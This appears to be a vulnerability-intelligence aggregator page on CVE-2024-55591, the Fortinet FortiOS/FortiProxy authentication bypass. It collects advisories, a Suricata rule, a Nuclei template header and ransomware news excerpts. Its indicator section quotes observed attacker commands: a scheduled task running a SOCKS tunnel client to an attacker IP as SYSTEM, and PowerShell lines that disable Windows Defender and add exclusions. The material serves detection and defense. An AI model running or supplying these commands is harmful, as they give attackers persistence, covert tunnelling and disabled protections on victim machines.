CVE-2024-55591
published 2025-01-14CVE-2024-55591: An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0…
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2025-01-21
Exploited in the wild
EPSS
98.26%
99.9th percentile
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortios | — | — |
| fortinet | fortios | >= 7.0.0 < 7.0.17 | 7.0.17 |
| fortinet | fortios | 7.0.0 – 7.0.16 | — |
| fortinet | fortiproxy | — | — |
| fortinet | fortiproxy | >= 7.0.0 < 7.0.20 | 7.0.20 |
| fortinet | fortiproxy | 7.0.0 – 7.0.19 | — |
| fortinet | fortiproxy | >= 7.2.0 < 7.2.13 | 7.2.13 |
| fortinet | fortiproxy | 7.2.0 – 7.2.12 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcmd.exe /C schtasks /create /tn WindowsConnSvc /tr C:\Windows\Temp\svchost32.exe client 77.110.122[.]137:37182 R:1085:socks /sc minute /mo 2 /ru SYSTEM /f > C:\Windows\Temp\RbHoNVNU.tmp 2>&1↗
commandpowershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force; Set-Service -Name WinDefend -StartupType Disabled↗
commandpowershell -Command Add-MpPreference -ExclusionProcess C:\Users\[REDACTED]\downloads\G_hlm7jj_windows_amd64.exe -Force↗
- →CVE-2024-55591 exploitation uses WebSocket-based attacks via the jsconsole interface or direct HTTPS requests to exposed firewall management interfaces to gain super_admin privileges ↗
- →CVE-2024-55591 exploitation involves crafted requests to the Node.js websocket module; monitor FortiOS/FortiProxy management interface for anomalous WebSocket connections ↗
- →Post-exploitation: watch for creation of rogue local/admin accounts on FortiGate devices, especially accounts named forticloud-tech, fortigate-firewall, or adnimistrator (note typo), and addition to SSL VPN user groups ↗
- →jsconsole usage was a common thread across CVE-2024-55591 exploitation intrusions; monitor FortiGate logs for jsconsole activity from unexpected source IPs ↗
- →CVE-2024-55591 mass-exploitation campaign followed four phases: vulnerability scanning (Nov 16–23), reconnaissance (Nov 22–27), SSL VPN configuration (Dec 4–7), lateral movement (Dec 16–27, 2024) ↗
- →Detect The Gentlemen ransomware post-exploitation: look for Scheduled Task named 'WindowsConnSvc' executing svchost32.exe from C:\Windows\Temp with SOCKS proxy arguments, running every 2 minutes as SYSTEM ↗
- →Detect The Gentlemen ransomware: ransom note filename README-GENTLEMEN.txt and encrypted file extension .fjn1jw are unique indicators for file-based detection ↗
- →Detect defense evasion: PowerShell commands disabling WinDefend service and adding C:\ as an exclusion path are strong indicators of pre-ransomware activity ↗
- →Monitor Windows Event Log clearing: Event ID 104 (Application/System logs cleared) and Event ID 1102 (Security log cleared) observed in The Gentlemen attacks post-CVE-2024-55591 exploitation ↗
- →SuperBlack ransomware (Mora_001) post-exploitation: attacker modifies firewall automation tasks to recreate rogue admin accounts if removed; monitor FortiGate automation task changes ↗
- →SuperBlack ransomware deploys a wiper called WipeBlack after encryption to remove ransomware executable traces; also used by BrainCipher, EstateRansomware, and SenSayQ ransomware ↗
- ·CVE-2024-55591 affects FortiOS 7.0.0–7.0.16 and FortiProxy 7.0.0–7.0.19 and 7.2.0–7.2.12; patched in FortiOS 7.0.17+ and FortiProxy 7.0.20/7.2.13+. Customers who patched for CVE-2024-55591 are also protected against CVE-2025-24472. ↗
- ·Fortinet confirmed CVE-2025-24472 was NOT exploited in the wild at time of disclosure; only CVE-2024-55591 was confirmed exploited. Patching for CVE-2024-55591 covers both. ↗
- ·If patching is not immediately possible, Fortinet advises disabling the HTTP/HTTPS administrative interface or restricting access via local-in policies to limit exposure to CVE-2024-55591. ↗
- ·CVE-2024-55591 was exploited as a zero-day since at least mid-November 2024, before Fortinet's January 14, 2025 disclosure; organizations should assume potential compromise if management interfaces were internet-exposed during that window. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v4mr-pqhx-vpm2: An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7
ghsa_unreviewed·2025-01-14
CVE-2024-55591 [CRITICAL] CWE-288 GHSA-v4mr-pqhx-vpm2: An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
VulnCheck
Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-55591 [CRITICAL] CWE-288 Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
Fortinet FortiOS and FortiProxy contain an authentication bypass vulnerability that may allow an unauthenticated, remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Affected: Fortinet FortiOS and FortiProxy
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.rapid7.com/blog/post/2025/01/16/etr-fortinet-firewalls-hit-with-new-zero-day-attack-older-data-leak
Fortinet
Authentication bypass in Node.js websocket module and CSF requests
vendor_fortinet·2025-01-14·CVSS 9.8
CVE-2024-55591 [CRITICAL] CWE-288 Authentication bypass in Node.js websocket module and CSF requests
FG-IR-24-535: Authentication bypass in Node.js websocket module and CSF requests
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS 7.0.0 through 7.0.16 and FortiProxy 7.2.0 through 7.2.12, 7.0.0 through 7.0.19 may allow a remote unauthenticated attacker with prior knowledge of upstream and downstream devices serial numbers to gain super-admin privileges on the downstream device, if the Security Fabric is enabled, via crafted CSF proxy r
CISA
Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
cisa·2025-01-14·CVSS 9.8
CVE-2024-55591 [CRITICAL] CWE-288 Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
Vulnerability: Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
Affected: Fortinet FortiOS and FortiProxy
Fortinet FortiOS and FortiProxy contain an authentication bypass vulnerability that may allow an unauthenticated, remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://fortiguard.fortinet.com/psirt/FG-IR-24-535 ; https://nvd.nist.gov/vuln/detail/CVE-2024-55591
Remediation Due Date: 2025-01-21
Suricata
ET WEB_SPECIFIC_APPS Fortinet Authentication Bypass via Node.js Websocket (CVE-2024-55591)
suricata·2025-01-16·CVSS 9.8
CVE-2024-55591 [CRITICAL] ET WEB_SPECIFIC_APPS Fortinet Authentication Bypass via Node.js Websocket (CVE-2024-55591)
ET WEB_SPECIFIC_APPS Fortinet Authentication Bypass via Node.js Websocket (CVE-2024-55591)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Fortinet Authentication Bypass via Node.js Websocket (CVE-2024-55591)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/"; pcre:"/^\w+\-[a-zA-Z0-9]{6}$/R"; http.header; to_lowercase; content:"sec-websocket-key|3a 20|"; fast_pattern; content:"upgrade|3a 20|websocket"; content:!"origin|3a 20|http"; reference:url,github.com/watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591; reference:cve,2024-55591; classtype:web-application-attack; sid:2059283; rev:1; metadata:affected_product Fortigate, attack_target Server, tls_state TLSDecrypt, created_at 2025_01_16, cve CVE_2024_55591, deployment Perimet
Nuclei
Fortinet - Authentication Bypass
nuclei·CVSS 9.8
CVE-2024-55591 [CRITICAL] Fortinet - Authentication Bypass
Fortinet - Authentication Bypass
Fortinet FortiOS is vulnerable to an information disclosure via service-worker.js that could allow an attacker to access sensitive information.This vulnerability affects FortiOS and could potentially lead to unauthorized access to the system.
Template:
id: CVE-2024-55591
info:
name: Fortinet - Authentication Bypass
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
Fortinet FortiOS is vulnerable to an information disclosure via service-worker.js that could allow an attacker to access sensitive information.This vulnerability affects FortiOS and could potentially lead to unauthorized access to the system.
impact: |
Unauthenticated attackers can bypass authentication mechanisms to access sensitive system information and gain unauthor
Hackernews
The Gentlemen Ransomware Claims 478 Victims, Can Spread Like a Worm
blogs_hackernews·2026-06-11
CVE-2024-55591 The Gentlemen Ransomware Claims 478 Victims, Can Spread Like a Worm
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## The Gentlemen Ransomware Claims 478 Victims, Can Spread Like a Worm
A new analysis of The Gentlemen operation has revealed that the financially motivated threat group initially operated as an affiliate responsible for conducting double extortion attacks, while leveraging resources from various ransomware-as-a-service (RaaS) schemes like LockBit (aka Tenacious Mantis), Qilin (aka Pestilent Mantis), and Medusa (aka Venomous Mantis).
According to a detailed report published by PRODAFT, the group, which it tracks as Phantom Mantis, is led by a Russian-speaking cybercriminal it calls LARVA-368, who goes by the online aliases hast
Huntress
The Gentleman Ransomware | Defense Evasion TTPs Uncovered | Huntress
blogs_huntress·2026-05-21
CVE-2024-55591 The Gentleman Ransomware | Defense Evasion TTPs Uncovered | Huntress
Acknowledgments: Huntress wishes to recognize the contributions of SOC analysts Nick Roddy and Dani Lopez for their investigations and analysis into these incidents.
The Huntress SOC recently came across two incidents involving The Gentlemen ransomware, an operation that first emerged in mid-2025 and has been very active since then, with Ransomware.live showing claims of over 400 victims across at least 70 countries.
One intriguing aspect of previous The Gentlemen incidents is the defense evasion strategy used by threat actors that have deployed the ransomware. According to a Trend Micro report , threat actors have used custom-built defense evasion tools and capabilities to disable security solutions in The Gentlemen attacks. A more recent leak of the operation’s internal database, in ea
Checkpoint
Thus Spoke…The Gentlemen
blogs_checkpoint·2026-05-13·CVSS 9.8
CVE-2024-55591 [CRITICAL] Thus Spoke…The Gentlemen
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Thus Spoke…The Gentlemen
## Key Points
On May 4th, 2026, The Gentlemen RaaS administrator acknowledged on underground forums that an internal backend database ( Rocket ) had been leaked.
Checkpoint
The State of Ransomware – Q1 2026
blogs_checkpoint·2026-05-11
CVE-2024-55591 The State of Ransomware – Q1 2026
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## The State of Ransomware – Q1 2026
## Key Findings
Consolidation after peak fragmentation: The top 10 ransomware groups accounted for 71% of all Q1 2026 victims, a sharp reversal from the
Tenable
CVE-2026-35616: Fortinet FortiClientEMS improper access control vulnerability exploited in the wild
blogs_tenable·2026-04-06·CVSS 9.8
[CRITICAL] CVE-2026-35616: Fortinet FortiClientEMS improper access control vulnerability exploited in the wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Hackernews
ThreatsDay Bulletin: FortiGate RaaS, Citrix Exploits, MCP Abuse, LiveChat Phish & More
blogs_hackernews·2026-03-19·CVSS 9.8
[CRITICAL] ThreatsDay Bulletin: FortiGate RaaS, Citrix Exploits, MCP Abuse, LiveChat Phish & More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ThreatsDay Bulletin: FortiGate RaaS, Citrix Exploits, MCP Abuse, LiveChat Phish & More
ThreatsDay Bulletin is back on The Hacker News, and this week feels off in a familiar way. Nothing loud, nothing breaking everything at once. Just a lot of small things that shouldn’t work anymore but still do.
Some of it looks simple, almost sloppy, until you see how well it lands. Other bits feel a little too practical, like they’re already closer to real-world use than anyone wants to admit. And the background noise is getting louder again, the kind people usually ignore.
A few stories are clever in a bad way. Others are just frustrati
Mandiant
Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape
blogs_mandiant·2026-03-16
Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape
## Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape
## Google Threat Intelligence Group
## Google Threat Intelligence
Visibility and context on the threats that matter most.
Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark
## Introduction
Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities, w
Mandiant
Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape
blogs_mandiant·2026-03-16
Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape
Threat Intelligence
# Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape
March 16, 2026
##### Google Threat Intelligence Group
##### Google Threat Intelligence
Visibility and context on the threats that matter most.
Contact Us & Get a Demo
Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark
### Introduction
Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditiza
Greynoiseio
The Noise in the Silence: Unmasking CISA's Hidden KEV Ransomware Updates
blogs_greynoiseio·2026-02-02
The Noise in the Silence: Unmasking CISA's Hidden KEV Ransomware Updates
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Tenable
CVE-2025-64155 PoC released Command Injection Vulnerability
blogs_tenable·2026-01-14·CVSS 9.8
[CRITICAL] CVE-2025-64155 PoC released Command Injection Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2025-64446 FortiWeb Zero-Day Exploited
blogs_tenable·2025-11-14·CVSS 9.8
[CRITICAL] CVE-2025-64446 FortiWeb Zero-Day Exploited
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
IT threat evolution in Q2 2025. Non-mobile statistics
blogs_securelist·2025-09-05
IT threat evolution in Q2 2025. Non-mobile statistics
Table of Contents
The quarter in numbers
Ransomware
Quarterly trends and highlights
Law enforcement success
Vulnerabilities and attacks
Mass exploitation of a vulnerability in SAP NetWeaver
Attacks via the SimpleHelp remote administration tool
Qilin exploits vulnerabilities in Fortinet
Exploitation of a Windows CLFS vulnerability
The most prolific groups
Number of new variants
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 countries and territories attacked by ransomware Trojans
TOP 10 most common families of ransomware Trojans
Miners
Number of new variants
Number of users attacked by miners
Geography of attacked users
TOP 10 countries and territories attacked by miners
Attacks on macOS
TOP 20 threats to macOS
Geography of threats t
Securelist
Desktop and IoT threat report for Q2 2025
blogs_securelist·2025-09-05
Desktop and IoT threat report for Q2 2025
Table of Contents
- The quarter in numbers
- Ransomware
- Miners
- Attacks on macOS
- IoT threat statistics
- Attacks via web resources
- Local threats
Authors
- AMR
IT threat evolution in Q2 2025. Non-mobile statistics
IT threat evolution in Q2 2025. Mobile statistics
The statistics in this report are based on detection verdicts returned by Kaspersky products unless otherwise stated. The information was provided by Kaspersky users who consented to sharing statistical data.
## The quarter in numbers
In Q2 2025:
- Kaspersky solutions blocked more than 471 million attacks originating from various online resources.
- Web Anti-Virus detected 77 million unique links.
- File Anti-Virus blocked nearly 23 million malicious and potentially unwanted objects.
- There were 1,702 new ransomwar
Bleepingcomputer
Nissan confirms design studio data breach claimed by Qilin ransomware
blogs_bleepingcomputer·2025-08-26
Nissan confirms design studio data breach claimed by Qilin ransomware
## Nissan confirms design studio data breach claimed by Qilin ransomware
## Bill Toulas
Nissan Japan has confirmed to BleepingComputer that it suffered a data breach following unauthorized access to a server of one of its subsidiaries, Creative Box Inc. (CBI).
This came in response to the Qilin ransomware group's claims that they had stolen four terabytes of data from CBI, including 3D vehicle design models, internal reports, financial documents, VR design workflows, and photos.
"On August 16, 2025, suspicious access was detected on the data server of Creative Box Inc. (CBI), a company contracted by Nissan for design work," stated a Nissan spokesperson to BleepingComputer.
"CBI immediately implemented emergency measures, such as blocking all access to the server, to mitigate the risk,
Tenable
CVE-2025-25256: Proof of Concept Released for Critical Fortinet FortiSIEM Command Injection Vulnerability
blogs_tenable·2025-08-13·CVSS 9.8
[CRITICAL] CVE-2025-25256: Proof of Concept Released for Critical Fortinet FortiSIEM Command Injection Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
The Heat Wasn't Just Outside: Cyber Attacks Spiked in Summer 2025
blogs_bleepingcomputer·2025-08-05·CVSS 9.8
[CRITICAL] The Heat Wasn't Just Outside: Cyber Attacks Spiked in Summer 2025
## The Heat Wasn't Just Outside: Cyber Attacks Spiked in Summer 2025
## Picus Security
Summer 2025 wasn't just hot; it was relentless.
Ransomware hammered hospitals, retail giants suffered data breaches, insurance firms were hit by phishing, and nation-state actors launched disruptive campaigns.
From stealthy PowerShell loaders to zero-day SharePoint exploits, attackers kept defenders on their heels.
This report breaks down the season's most high-impact incidents and what security teams need to do before the next wave hits.
## Summer Expose Healthcare's Growing Ransomware Risk
Hospitals can't afford downtime, and attackers know it.
This summer, ransomware groups targeted healthcare, exploiting both the value of patient data and the urgency of care.
## Interlock rises as a major th
Bleepingcomputer
Critical Fortinet flaws now exploited in Qilin ransomware attacks
blogs_bleepingcomputer·2025-06-06·CVSS 9.8
[CRITICAL] Critical Fortinet flaws now exploited in Qilin ransomware attacks
## Critical Fortinet flaws now exploited in Qilin ransomware attacks
## Sergiu Gatlan
The Qilin ransomware operation has recently joined attacks exploiting two Fortinet vulnerabilities that allow bypassing authentication on vulnerable devices and executing malicious code remotely.
Qilin (also tracked as Phantom Mantis) surfaced in August 2022 as a Ransomware-as-a-Service (RaaS) operation under the "Agenda" name and has since claimed responsibility for over 310 victims on its dark web leak site.
Its victim list also includes high-profile organizations, such as automotive giant Yangfeng , publishing giant Lee Enterprises , Australia's Court Services Victoria , and pathology services provider Synnovis . The Synnovis incident impacted several major NHS hospitals in London, which forced the
Tenable
CVE-2025-32756: Zero-Day Vulnerability in Multiple Fortinet Products Exploited in the Wild
blogs_tenable·2025-05-14·CVSS 9.8
[CRITICAL] CVE-2025-32756: Zero-Day Vulnerability in Multiple Fortinet Products Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
Critical FortiSwitch flaw lets hackers change admin passwords remotely
blogs_bleepingcomputer·2025-04-09·CVSS 7.5
CVE-2024-48887 [HIGH] Critical FortiSwitch flaw lets hackers change admin passwords remotely
## Critical FortiSwitch flaw lets hackers change admin passwords remotely
## Sergiu Gatlan
Fortinet has released security patches for a critical vulnerability in its FortiSwitch devices that can be exploited to change administrator passwords remotely.
The company says Daniel Rozeboom of the FortiSwitch web UI development team discovered the vulnerability ( CVE-2024-48887 ) internally.
Unauthenticated attackers can exploit this unverified FortiSwitch GUI password change security flaw (rated with a 9.8/10 severity score) in low-complexity attacks that don't require user interaction.
Fortinet says threat actors can change credentials using a specially crafted request sent via the set_password endpoint.
"An unverified password change vulnerability [CWE-620] in FortiSwitch GUI may allow a
Bleepingcomputer
New SuperBlack ransomware exploits Fortinet auth bypass flaws
blogs_bleepingcomputer·2025-03-13·CVSS 9.8
CVE-2024-55591 [CRITICAL] New SuperBlack ransomware exploits Fortinet auth bypass flaws
## New SuperBlack ransomware exploits Fortinet auth bypass flaws
## Bill Toulas
A new ransomware operator named 'Mora_001' is exploiting two Fortinet vulnerabilities to gain unauthorized access to firewall appliances and deploy a custom ransomware strain dubbed SuperBlack.
The two vulnerabilities, both authentication bypasses, are CVE-2024-55591 and CVE-2025-24472, which Fortinet disclosed in January and February, respectively.
When Fortinet first disclosed CVE-2024-55591 on January 14, they confirmed it had been exploited as a zero-day , with Arctic Wolf stating it had been used in attacks since November 2024 to breach FortiGate firewalls.
Confusingly, on February 11, Fortinet added CVE-2025-2447 to their January advisory , which led many to believe it was a newly exploited flaw. How
Bleepingcomputer
Fortinet discloses second firewall auth bypass patched in January
blogs_bleepingcomputer·2025-02-11·CVSS 9.8
CVE-2025-24472 [CRITICAL] Fortinet discloses second firewall auth bypass patched in January
## Fortinet discloses second firewall auth bypass patched in January
## Sergiu Gatlan
Update 2/11/25 07:32 PM ET: After publishing our story, Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January.
Furthermore, even though today's updated advisory indicates that both flaws were exploited in attacks and even includes a workaround for the new CSF proxy requests exploitation pathway, Fortinet says that only CVE-2024-55591 was exploited.
Fortinet told BleepingComputer that if a customer previously upgraded based on the guidance in FG-IR-24-535 / CVE-2024-55591, then they are already protected against the newly disclosed vulnerability.
The title of our story has been updated to reflect this new information, a
Wiz
Crying Out Cloud Newsletter - February 2025 | Wiz
blogs_wiz·2025-02-06
Crying Out Cloud Newsletter - February 2025 | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's dive in.
Here are our top picks of cloud security highlights!
Hype or no hype – Codefinger Ransomware Campaign Targeting S3 Buckets
Codefinger is a ransomware campaign that exploits AWS Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data in Amazon S3 buckets. While this campaign has sparked widespread concern, we argue that the panic is unwarranted. Many have focused on detecting unwanted SSE-C encryption as a mitigation strategy, but encryption is merely a tactic chosen by the attacker after gaining access—it is not the core issue. The real concern, which is neither new nor unique, is the use of compromised credential
Checkpoint
3rd February – Threat Intelligence Report
blogs_checkpoint·2025-02-03
CVE-2024-55591 3rd February – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 3rd February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 3rd February, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Mizuno USA, giant sports equipment manufacturer, has confirmed a cyber-attack that resulted in the theft of personal information from its network between August and October 2024. The data breach included names, Social Security numbers, financial account information, driver’s license details, and passport numbers. The Bian
Tenable
CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
blogs_tenable·2025-01-14·CVSS 9.8
[CRITICAL] CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
Fortinet warns of auth bypass zero-day exploited to hijack firewalls
blogs_bleepingcomputer·2025-01-14·CVSS 9.8
CVE-2024-55591 [CRITICAL] Fortinet warns of auth bypass zero-day exploited to hijack firewalls
## Fortinet warns of auth bypass zero-day exploited to hijack firewalls
## Sergiu Gatlan
Attackers are exploiting a new authentication bypass zero-day vulnerability in FortiOS and FortiProxy to hijack Fortinet firewalls and breach enterprise networks.
This security flaw (tracked as CVE-2024-55591 ) impacts FortiOS 7.0.0 through 7.0.16, FortiProxy 7.0.0 through 7.0.19, and FortiProxy 7.2.0 through 7.2.12. Successful exploitation allows remote attackers to gain super-admin privileges by making malicious requests to the Node.js websocket module.
Fortinet says attackers exploiting the zero-day in the wild are creating randomly generated admin or local users on compromised devices and are adding them to existing SSL VPN user groups or to new ones they also add.
They've also been observed a
Greynoiseio
NoiseLetter March 2026
